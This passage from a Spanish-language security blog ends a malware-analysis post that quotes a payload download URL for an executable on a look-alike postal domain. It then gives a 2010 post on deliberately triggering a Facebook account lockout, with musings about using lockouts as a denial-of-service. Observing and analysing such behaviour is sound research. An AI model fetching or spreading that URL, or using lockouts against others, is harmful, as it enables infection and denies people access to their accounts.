Se acaban de descargar dos archivos... versaoatual.txt y downloadkey.txt... con información poco relevante a esta altura versaoatual.txt=007 y downloadkey.txt=http://correioss.info/nero1.exe. 007 número apropiado cierto? :P.

Habría que escribir a nuestro amigo wwwcraix un mail???

martes, 6 de julio de 2010

Jugando con el login the facebook

buenassss, un post cortito y divertido, jugando un poco antes de empezar a estudiar acabo de bloquear mi cuenta de facebook por exceso de intentos fallidos. Obtuve la siguiente imagen :D :


Lo divertido en todo esto es que luego de muchos intentos fallidos la cuenta queda bloqueada y exige un cambio de contraseña (algo razonable???). No permite iniciar sesión... de ninguna manera aparentemente.

Otro punto divertido es que ya cambié la contraseña 2 veces y sigo recibiendo el mismo mensaje :D, por lo tanto hasta ahora cabe la idea de que el bloqueo de la cuenta sea temporal... esto podría considerarse un ataque de denegación de servicio??? mmm, si acceder a mi cuenta fuese de vital importancia y alguien se encarga de que no pueda acceder... interesante :P, a charlar con los chicos de facebook.

Me olvidé de contar la cantidad de accesos fallidos, ese es el próximo paso :D.

Update I:

Límite de solicitud de contraseñas alcanzado... sigo sin poder acceder a la cuenta.


Un epic FAIL gracioso: solicitud "eSXpirada"